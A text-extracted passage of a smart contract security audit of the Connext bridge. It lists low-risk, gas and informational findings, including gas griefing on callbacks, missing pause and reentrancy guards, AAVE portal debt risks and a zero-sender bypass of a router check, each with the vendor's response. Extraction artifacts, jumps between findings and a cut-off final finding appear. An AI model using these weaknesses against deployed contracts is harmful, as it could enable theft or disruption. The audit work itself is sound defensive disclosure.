Recommendation: Consider limiting the amount of gas sent to s.executor.execute(). Connext: It's the responsibility of the relayer to do a proper gas estimate (and leave a bit of overhead). The user should have provided a sufficient fee (in ETH) on the sending chain for the relayer to be slightly generous in its gas estimation. If the call reverts (for any reason, including out of gas), the relayer can just call it again (perhaps pending another bump from the user in their gas fee). Spearbit: Acknowledged.

+5.4.9 Several external functions missing whenNotPaused modifier Severity: Low Risk Context: BridgeFacet.sol#L380-L386, PortalFacet.sol#L80-L167 Description: The following functions don't have a whenNotPaused modifier, while most other external functions do: • bumpTransfer of BridgeFacet.
• forceReceiveLocal of BridgeFacet. • repayAavePortal of PortalFacet. • repayAavePortalFor of PortalFacet. Without whenNotPaused, these functions can still be executed when the protocol is paused. Recommendation: Double-check to see if whenNotPaused is useful here. Connext: Given earlier conclusions about portal repayment being taken out-of-band, we're going to acknowledge but not fix repayAavePortal and repayAavePortalFor. bumpTransfer fixed (whenNotPaused was added) in PR 1377. forceReceiveLocal only modifies the state property to override whether to receive the local token, and it's permissioned. Doesn't seem necessary to include whenNotPaused for this reason. Acknowledged on that front. Spearbit: Verified and acknowledged.

+5.4.10 Gas griefing attack on callback execution Severity: Low Risk Context: PromiseRouter.sol#L250 Description: When the callback is executed on the source chain, the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesn't get the callback fee.

ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData());

Recommendation: • Decide on a fixed gas stipend to forward to this call, so that even if it consumes all of it, the transaction still has enough to continue. • Enclose the call in a try-catch block. In case of a revert from the callback, continue the execution and transfer the callback fee to msg.sender. Connext: Solved in PR 1610. Spearbit: Verified.

+5.4.11 Callback fails when returnData is empty Severity: Low Risk Context: PromiseRouter.sol#L173 Description: If a transfer involves a callback, PromiseRouter reverts if returnData is empty.

if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty();

However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess). Recommendation: Consider removing the revert when _returnData is empty, i.e. delete the line at PromiseRouter.sol#L173.
} } 34 Recommendation: Double check the fee on transfer handling. Connext: Solved in PR 1550. Spearbit: Verified. +5.5.2 Some gas can be saved in reimburseLiquidityFees Severity: Gas Optimization Context: SponsorVault.sol#L197-L226 Description: Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if } Recommendation: Assign tokenExchange before the if statement. Connext: Solved in PR 1654. Spearbit: Verified. +5.5.3 LIQUIDITY_FEE_DENOMINATOR could be a constant Severity: Gas Optimization Context: BridgeFacet.sol, PortalFacet.sol, AssetLogic.sol Description: The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: BridgeFacet.sol: BridgeFacet.sol: PortalFacet.sol: AssetLogic.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; Recommendation: Consider creating a constant for LIQUIDITY_FEE_DENOMINATOR. Connext: Solved in PR 1660. Spearbit: Verified. +5.5.4 Access elements from storage array instead of loading them in memory Severity: Gas Optimization Context: SwapUtils.sol#L1016-L1034 Description: SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array in memory which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); 35 Recommendation: Consider using the storage array self.pooledTokens directly: - IERC20[] memory pooledTokens = self.pooledTokens; ... - uint256 numTokens = pooledTokens.length; + uint256 numTokens = self.pooledTokens.length; ... - pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); + self.pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); Connext: Solved in PR 1600. Spearbit: Verified. +5.5.5 Send information through calldata instead of having callee query Executor Severity: Gas Optimization Context: Executor.sol#L35-L60, Executor.sol#L201-L211 The contract (henceforth referred to as callee) called by Executor.sol should check Description: Executor.originSender(), Executor.origin(), and Executor.amount() to permission crosschain calls. This costs extra gas because of staticcall’s made to an external contract. Recommendation: Pass originSender, origin, and amount as part of the calldata to the callee to save the three external calls. Reading from calldata is cheaper instead. Connext: Solved in PR 1648. Spearbit: Verified. 5.6 Informational +5.6.1 AAVE portal debt might not be repaid in full if debt is converted to interest paying Severity: Informational Context: NomadFacet.sol#L176-L256 BridgeFacet.sol#L599-L608, BridgeFacet.sol#L723-L748, NomadFacet.sol#L146-L150, Description: The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. 
The process for receiving unbacked debt is as follows: • During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. • If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncol- lateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. • Currently the debt is fixed fee, see arc-whitelist-connext-for-v3-portals, however this might be changed in the future out of band. • Incase this would be changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee, hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbacked- MintCap has been reached and noone is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade, however, it is important to highlight and address these issues early. Recommendation: Ensure this is documented and potentially add a function to allow anyone to pay off out-of- band Aave debt. It may also make sense to use part of the fee paid out to the protocol and LPs to pay off aToken 36 interest. However, the more equitable approach would be to expect routers to pay off their own interest. This serves as an incentive to pay off unbacked debt as soon as possible. Connext: As a note, we plan on upgrading the portal implementation to make it more amenable to these types of issues in future versions outlined here Spearbit: Acknowledged. +5.6.2 Routers pay the slippage cost for users when using AAVE credit Severity: Informational Context: BridgeFacet.sol#L723-L748 transfer with AAVE’s credit users get s.aavePortalFeeNumerator Description: When routers do the fast of adopted token and _fastTransferAmount = * _fastTransferAmount /s.LIQUIDITY_FEE_DENOMINATOR _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens are larger than the liquidityFee. function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; ,! ,! ,! IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; ,! emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); } Recommendation: Routers should monitor local tokens’ peg and stop using AAVE’s liquidity when the price is off. Connext: Yes this is true -- and they can engage in the monitoring offchain. 
There is also an option for them to back the loan with the adopted asset directly, so they can more fine-tune their impact due to slippage. Spearbit: Acknowledged. 37 +5.6.3 Optimize max checks in initializeSwap() Severity: Informational Context: SwapAdminFacet.sol#L107-L175 Description: The function initializeSwap() reverts if a value is >= ...MAX.... Probably should revert when > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... } Recommendation: Change >= to >. Connext: The values are set to specific whole numbers within SwapUtils, so code can stay as is. Spearbit: Acknowledged. +5.6.4 All routers share the same AAVE debt Severity: Informational Context: BridgeFacet.sol#L723-L748 Description: The mintUnbacked amount is allocated to the calling contract (eg the Connext Diamond that has the BRIDGE role permission). Thus it is not separated to different routers, if one router does not payback its debt (in time) and has the max debt then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ... } Recommendation: Consider having a separate authorized contract per router, which has the right to borrow from AAVE. Connext: A future improvement for the protocol will be around the experience of being an LP and how the contract custodies funds. One of the improvements would be thinking of funds as having an internal and external source, and making that external source more modularized. This way AAVE could be one of various different external liquidity sources. How we are planning on handling this in production is only having one router who is registered for portals. That way the concerns around portals are constrained to a single router while we develop a better, more generalized solution. Acknowledge this as an issue, and it will be addressed onchain in future upgrades and by offchain policy until then. Spearbit: Acknowledged. 38 +5.6.5 Careful with fee on transfer tokens on AAVE loans Severity: Informational Context: BridgeLogic.sol#L110-L140, PortalFacet.sol#L179-L197 Description: The Aave function backUnbacked() does not account for fee on transfer tokens. If these happen to be used then the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ... } } Recommendation: Be careful with fee on transfer tokens with Aave loans. Connext: I’m not aware of any tokens that have fees on one domain, and not on another, but we will make sure this is tracked against assets we add to the whitelist. Note: We removed support for fee on transfer tokens. Spearbit: Acknowledged. +5.6.6 Let getTokenPrice() also return the source of the price info Severity: Informational Context: ConnextPriceOracle.sol#L88-L107 Description: The function getTokenPrice() can get its prices information from multiple sources. 
For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { } Recommendation: Consider returning an extra value which indicates the source. For example: direct, chainlink- oracle, dex-spot, v1PriceOracle, NA Connext: Solved in PR 1658. Spearbit: Verified. 39 +5.6.7 Typos in the comments of _swapAsset() and _swapAssetOut() Severity: Informational Context: AssetLogic.sol#L252-L362 Description: There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ... Recommendation: Update the comments: -@notice Swaps assetIn t assetOut +@notice Swaps assetIn to assetOut Connext: Solved in PR 1653. Spearbit: Verified. +5.6.8 Consistently delete array entries in PromiseRouter Severity: Informational Context: PromiseRouter.sol#L226-L258 Description: In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same it better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... } Recommendation: Consider changing the code to: -callbackFees[transferId] = 0; +delete callbackFees[transferId]; Connext: Solved in PR 1652. Spearbit: Verified. 40 +5.6.9 getTokenPrice() will revert if setDirectPrice() is set in the future Severity: Low Risk Context: ConnextPriceOracle.sol#L195-L214, ConnextPriceOracle.sol#L88-L107 Description: The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect. Recommendation: Consider checking for this behaviour or instead prevent the admin from setting the price timestamp in the future. Connext: Solved in PR 1646. Spearbit: Verified. +5.6.10 Roundup in words not optimal Severity: Informational Context: Connext copy of TypedMemView.sol#L424-L426, TypedMemView.sol#L380-L387 Description: The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice * @param memView * @return */ The number of memory words this memory view occupies, rounded up. The view uint256 - The number of memory words function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; } Recommendation: The code should most likely be: -return uint256(len(memView)).add(32) / 32; +return uint256(len(memView)).add(31) / 32; Connext: Solved in PR 1625. Alerted the Nomad team to the problem. Spearbit: Verified (for the Connext copy). Acknowledged (for the alert to Nomad). +5.6.11 callback could have capped returnData Severity: Informational Context: Executor.sol#L142-L243, PromiseRouter.sol#L226-L258 Description: The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_- COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped and this fact is not clearly documented. 41 function execute(...) ... { ... 
(success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... ,! } Recommendation: Document that the execute() function can have capped returnData, and that the callback() can receive chopped off data which might be interpreted in the wrong way. Connext: Solved in PR 1670. Spearbit: Verified. +5.6.12 Several external functions are not nonReentrant Severity: Informational Context: BridgeFacet.sol#L380-L386, PortalFacet.sol#L80-L167, RelayerFacet.sol#L130-L153 Description: The following functions don’t have nonReentrant, while most other external functions do have such modifier. • bumpTransfer of BridgeFacet. • forceReceiveLocal of BridgeFacet. • repayAavePortal of PortalFacet. • repayAavePortalFor of PortalFacet. • initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet imple- mented). A lot of the aggregators use the difference between pre-swap balance and post-swap balance. (e.g. uniswap v3 router , 1inch, etc.. ). While this isn’t exploitable yet, there is a chance that future updates might open up an issue to exploit. Recommendation: Consider adding nonReentrant on every functions that absorbs tokens/ value. Double check all other function to see if nonReentrant is useful. Connext: Solved in PR 1611. Spearbit: Verified. 42 +5.6.13 NomadFacet.reconcile() has an unused argument canonicalDomain Severity: Informational Context: NomadFacet.sol#L122 Description: NomadFacet.reconcile() has an unused argument canonicalDomain. Recommendation: Consider implementing one of the following: • Comment the argument to explicitly mark that it’s not used. • This issue will be resolved if the recommendation of issue titled "Canonical assets should be keyed on the hash of domain and id" is followed. Connext: Solved in PR 1523. Note: the PR was created to address the finalized update to the nomad BridgeRouter. Spearbit: Verified. Note: The BridgeRouter and its interface has changed quite a lot during and after this audit. It was out of scope for this audit but it is important to have a separate review of that code, including the interface to Connext. +5.6.14 SwapUtils._calculateSwap() returns two values with different precision Severity: Informational Context: SwapUtils.sol#L537-L538 Description: SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore severity is informa- tional. But without documentation it is easy to miss. Recommendation: Consider noting this difference in precision between the return values in the Natspec descrip- tion of _calculateSwap(). Connext: Solved in PR 1624. Spearbit: Verified. 
+5.6.15 Multicall.sol not compatible with Natspec Severity: Informational Context: Multicall.sol#L5-L17 Description: Multicall.sol Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses a low level call() method which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData); Recommendation: Replace call() with staticcall() and thus preventing state changes. Connext: Solved in PR 1612. Spearbit: Verified. 43 +5.6.16 reimburseRelayerFees only what is necessary Severity: Informational Context: SponsorVault.sol#L235-L271 Description: The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance relayerFeeCap is sufficient. So if a receiver already has a balance only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... } Recommendation: Consider changing the code as suggested below: -sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; + uint256 missingFee = relayerFeeCap - _to.balance; // already checked _to.balance <= relayerFeeCap +sponsoredFee = sponsoredFee >= missingFee ? missingFee : sponsoredFee; Connext: Solved in PR 1613. Spearbit: Verified. +5.6.17 safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _recon- cileProcessPortal Severity: Informational Context: NomadFacet.sol#L236-L237 NomadFacet.sol#L222-L223 It uses safeDe- Description: The NomadFacet uses safeIncreaseAllowance after clearing the allowance. creaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that SafeApprove has been deprecated for the concern of a front-running attack. It is only supported when setting an initial allowance or setting the allowance to zero SafeERC20.sol#L38 Recommendation: Use safeApprove instead. Connext: We have decided to lean on the policy that Aave portals will not be automatically repaid. Adding in the automatic repayment of portals adds complexity to the core codebase and leads to issues. Even with the portal repayment in place, issues such as a watcher disconnecting the xapp for an extended period mean we have to support out of band repayments regardless. By leaning on this as the only method of repayment, we are able to reduce the code complexity on reconcile. Furthermore, it does not substantially reduce trust. Aave portals essentially amount to an unsecured credit line, usable by bridges. If the automatic repayment fails for any reason (i.e. due to bad pricing in the AMM), then the LP associated with the loan must be responsible for closing out the position in a trusted way. Solved in PR 1585 by removing this code. Spearbit: Verified. 
+5.6.18 Event not emitted when ERC20 and native asset is transferred together to SponsorVault Severity: Informational Context: SponsorVault.sol#L279-L285 Description: Any ERC20 token or native asset can be transferred to the SponsorVault contract by calling the deposit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call, only a single event corresponding to the ERC20 transfer is emitted. Recommendation: Consider having separate functions to handle the ERC20 transfer and the native asset transfer:

function deposit(address _token, uint256 _amount) external {
  IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount);
  emit Deposit(_token, _amount, msg.sender);
}

function depositNative() external payable {
  emit Deposit(address(0), msg.value, msg.sender);
}

Connext: Solved in PR 1614. Spearbit: Verified.

+5.6.19 payable keyword can be removed Severity: Informational Context: StableSwapFacet.sol#L249, StableSwapFacet.sol#L273 Description: If a function does not need to have the native asset sent to it, it is recommended not to mark it as payable, to avoid any funds getting stuck. StableSwapFacet.sol has two payable functions, swapExact() and swapExactOut(), which only swap ERC20 tokens and are not expected to receive the native asset. Recommendation: Remove the payable keyword from swapExact() and swapExactOut(). Connext: Solved in PR 1615. Spearbit: Verified.

+5.6.20 Improve variable naming Severity: Informational Context: LibCrossDomainProperty.sol#L37, BridgeFacet.sol#L240-L339, BridgeFacet.sol#L644-L688, BaseConnextFacet.sol#L87-L95, LibConnextStorage.sol#L244-L248, BaseConnextFacet.sol#L17 Description: Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning, as they actually refer to the ownership whitelist being renounced.
In this func- tion: • _args.amount is equal to bridged_amount; 46 • _amount is equal to bridged_amount - liquidityFee (and potentially swapped amount). Recommendation: Rename the variables/functions to improve comprehension. Connext: Solved in PR 1608 and PR 1629. Spearbit: Verified. +5.6.21 onlyRemoteRouter can be circumvented Severity: Informational Context: Router.sol#L56-L58, BridgeRouter.sol#L112-L117, Replica.sol#L179-L204 The Code4rena contest suggested a modification Code4arena-254 that was fixed in Description: BaseConnextFacet-fix. However, the change has not been applied to Router.sol#L56-L58 which is currently in use. The modifier onlyRemoteRouter() can be mislead if the sender parameter has the value 0. The modifier uses _m.sender() from the received message by Nomad. Assuming all checks of Nomad work as expected this value cannot be 0 as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), "!proven"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), "!remote router"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } } Recommendation: To be extra careful, consider applying the changes also to Router.sol: 47 function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return s.remotes[_domain] == _router && _router != bytes32(0); } Connext: Solved in PR 1616. Spearbit: Verified. +5.6.22 Some dust not accounted for in reconcile() Severity: Informational Context: BridgeFacet.sol#L571-L628, NomadFacet.sol#L118-L165 Description: The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet() does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity. uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder ,! dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } } Recommendation: Consider giving the last router the remaining tokens (dust) in function reconcile(). 
Alternatively, add a comment that some dust tokens are neglected. Connext: Solved in PR 1617. Spearbit: Verified. +5.6.23 Careful with the decimals of BridgeTokens Severity: Informational Context: BridgeRouter.sol#L226-L334, BridgeToken.sol#L93-L119, SwapAdminFacet.sol#L107-L175, initializeSwap.ts#L109-L110 Description: The BridgeRouter sends token details, including the decimals(), over the Nomad bridge to configure a newly deployed token. After the hash is set with setDetailsHash(), anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces, so it might not be a large problem when setDetails() is executed at a later point in time. However, initializeSwap() also uses decimals(); it is called via off-chain code. The example code in initializeSwap.ts retrieves the decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts: depending on which is executed first, the swaps will have different results. Note: it could also break the ConnextPriceOracle. contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, "!committed details" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts const decimals = await Promise.all([ (await ethers.getContractAt("TestERC20", local)).decimals(), (await ethers.getContractAt("TestERC20", adopted)).decimals(), // setDetails might not have been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ... } } } Recommendation: Set the decimals of the deployed token on the destination chain in a deterministic way, or use the token decimals of the origin chain when calling initializeSwap(), and adapt the example code to prevent mistakes. Connext: Will be solved in deployment scripts. This PR adds a comment to the test deployment scripts: PR 1627. Spearbit: Acknowledged. +5.6.24 Incorrect comment about ERC20 approval to zero-address Severity: Informational Context: AssetLogic.sol#L289-L290 Description: The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesn't have this restriction, and ERC20 tokens based on solmate also don't revert on approving to the zero-address. There is no risk here, as the following line of code will revert for zero-address pools. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); Recommendation: Update the comments, for example:
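A possible corrected comment (the wording below is ours):

// NOTE: if the pool is not registered here, `pool` is the zero address;
// the approval itself may succeed, but the subsequent swap call reverts
SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount);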
Connext: Solved in PR 1618. Spearbit: Verified. +5.6.25 Native asset is delivered even if the wrapped asset is transferred Severity: Informational Context: BridgeFacet.sol#L292-L293, AssetLogic.sol#L75-L80, AssetLogic.sol#L140-L145 Description: Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... Recommendation: Consider removing the capability of transferring the native asset through Connext. Users can transfer wrapped assets, and the wrapping and unwrapping can happen outside the Connext system. This simplifies the code by removing a few branches that handle native assets and wrapped assets differently from the usual ERC20 tokens. Connext: Removed native asset handling in PR 2641. Spearbit: Verified. +5.6.26 Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance Severity: Informational Context: BridgeFacet.sol#L601-L608 Description: If the router picked by the Sequencer doesn't have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers, since there is a limit on the total maximum amount that can be borrowed. Recommendation: Borrow the difference between the transfer amount and the router's balance. Connext: I think keeping the original code is likely best, closing the PR! Spearbit: Acknowledged (the code would indeed get far more complicated trying to solve this). +5.6.27 Unused variable Severity: Informational Context: BridgeFacet.sol#L265 Description: The variable message is not used after declaration. bytes memory message; Recommendation: Remove this variable declaration. Connext: Solved in PR 1523. Spearbit: Verified. +5.6.28 Incorrect Natspec for adopted and canonical asset mappings Severity: Informational Context: LibConnextStorage.sol#L172-L184 Description: adoptedToCanonical maps adopted assets to canonical assets, but is described as a "Mapping of canonical to adopted assets"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a "Mapping of adopted to canonical assets". // /** // * @notice Mapping of canonical to adopted assets on this domain // * @dev If the adopted asset is the native asset, the keyed address will // * be the wrapped asset address // */ // 12 mapping(address => TokenId) adoptedToCanonical; // /** // * @notice Mapping of adopted to canonical on this domain // * @dev If the adopted asset is the native asset, the stored address will be the // * wrapped asset address // */ // 13 mapping(bytes32 => address) canonicalToAdopted; Recommendation: Update the Natspec comments to correctly describe the variables. Connext: Solved in PR 1588. Spearbit: Verified.
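A sketch of the corrected comments, with the two descriptions swapped to match the actual mapping directions:

/**
 * @notice Mapping of adopted to canonical assets on this domain
 * @dev If the adopted asset is the native asset, the keyed address will
 * be the wrapped asset address
 */
mapping(address => TokenId) adoptedToCanonical;

/**
 * @notice Mapping of canonical to adopted assets on this domain
 * @dev If the adopted asset is the native asset, the stored address will be the
 * wrapped asset address
 */
mapping(bytes32 => address) canonicalToAdopted;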
+5.6.29 Use of SafeMath for solc >= 0.8 Severity: Informational Context: AmplificationUtils.sol#L5-L16, SwapUtils.sol#L4-L21, ConnextPriceOracle.sol#L45, GovernanceRouter.sol#L20 Description: AmplificationUtils, SwapUtils, ConnextPriceOracle, and GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in Solidity reverts if it overflows or underflows, hence there is no need to use OpenZeppelin's SafeMath library. Recommendation: Remove SafeMath as a dependency and use vanilla arithmetic operators. Connext: Solved in PR 1619. GovernanceRouter.sol is a Nomad contract, so it will be handled by the Nomad team. Spearbit: Verified and acknowledged. 6 Appendix: Contract architecture overview diff --git a/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt new file mode 100644 index 0000000..dd593ba --- /dev/null +++ b/findings_newupdate/spearbit/ConnextNxtp-Spearbit-Security-Review.txt @@ -0,0 +1,214 @@ +5.1.1 swapInternal() shouldn't use msg.sender Severity: High Risk Context: • BridgeFacet.sol#L337-L369 • BridgeFacet.sol#L659-L750 • AssetLogic.sol#L150-L182 • AssetLogic.sol#L229-L262 • SwapUtils.sol#L798-L826 Description: As reported by the Connext team, the internal stable swap checks whether msg.sender has sufficient funds on execute(). This msg.sender is the relayer, which normally wouldn't have these funds, so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function 